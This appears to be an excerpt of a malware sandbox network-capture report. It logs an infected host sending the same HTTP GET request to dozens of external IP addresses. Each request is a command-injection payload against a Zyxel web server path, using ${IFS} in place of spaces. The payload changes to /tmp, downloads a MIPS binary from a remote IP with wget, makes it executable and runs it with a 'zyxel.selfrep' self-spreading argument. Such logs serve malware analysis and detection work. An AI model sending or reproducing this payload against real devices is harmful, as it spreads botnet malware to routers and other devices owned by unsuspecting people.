                                                Jan 12, 2024 18:16:33.711021900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7145192.168.2.2342304212.244.235.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711054087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7146192.168.2.2342818105.224.31.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711114883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7147192.168.2.234526288.43.215.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711186886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7148192.168.2.2343050205.57.13.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711222887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7149192.168.2.2347214136.174.34.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711286068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7150192.168.2.235969823.192.91.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711349964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7151192.168.2.234675831.234.199.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711396933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7152192.168.2.233389418.44.221.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711450100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7153192.168.2.233386079.176.202.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711512089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7154192.168.2.2343124114.170.165.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711585045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7155192.168.2.2333786147.166.63.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711631060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7156192.168.2.2350752156.153.170.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711684942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7157192.168.2.2360278211.74.88.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711736917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7158192.168.2.234670272.177.46.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711793900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7159192.168.2.2355916180.224.45.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711828947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7160192.168.2.2355428202.161.110.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711903095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7161192.168.2.235617846.238.60.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.711966991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7162192.168.2.233519285.243.23.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.712042093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7163192.168.2.2343270156.200.169.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.712090969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7164192.168.2.234400845.157.211.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.712136030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7165192.168.2.23466882.231.85.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.712197065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7166192.168.2.2350732126.214.220.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.717427015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7167192.168.2.2352540102.174.126.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.717525959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7168192.168.2.2347978204.213.214.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.717578888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7169192.168.2.2357856103.165.79.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.717633009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7170192.168.2.2341714154.9.153.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.717691898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7171192.168.2.236092682.95.105.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.717725992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7172192.168.2.2342684223.104.245.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713380098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7173192.168.2.2338230128.81.211.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713423967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7174192.168.2.233634083.17.221.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713443041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7175192.168.2.2347140216.155.95.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713495970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7176192.168.2.235334689.107.96.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713540077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7177192.168.2.2351346106.130.124.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713598967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7178192.168.2.2340950218.49.205.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713628054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7179192.168.2.2343344156.100.4.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713670015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7180192.168.2.2341422110.40.18.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713715076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7181192.168.2.236088892.7.13.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713747978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7182192.168.2.234468624.87.246.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713798046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7183192.168.2.2333906163.157.112.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713825941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7184192.168.2.23329601.183.10.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713862896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7185192.168.2.234940858.28.8.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713912964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7186192.168.2.235405671.24.193.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713929892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7187192.168.2.2337024152.152.219.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713968039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7188192.168.2.233780671.254.130.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.713994026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7189192.168.2.234560031.137.209.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714071035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7190192.168.2.2347312142.8.56.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714113951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7191192.168.2.233416073.35.116.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714138985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192192.168.2.2346162112.254.218.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714176893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7193192.168.2.2348288180.159.214.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714230061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7194192.168.2.2349834212.53.80.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714260101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7195192.168.2.2355728157.195.215.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714340925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7196192.168.2.2351408171.120.0.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714366913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7197192.168.2.2343582153.110.250.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714406967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7198192.168.2.2360298124.118.31.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714446068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7199192.168.2.235775840.214.28.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714471102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7200192.168.2.2355950103.76.104.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714523077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7201192.168.2.233491273.92.212.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714549065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7202192.168.2.2350860113.105.243.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714591980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7203192.168.2.2351774191.164.173.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714654922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7204192.168.2.2348546172.189.161.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714692116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7205192.168.2.234489854.31.157.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714728117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7206192.168.2.2336122218.155.16.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714766979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7207192.168.2.2345590168.172.238.92443
                                                TimestampBytes transferredDirectionData
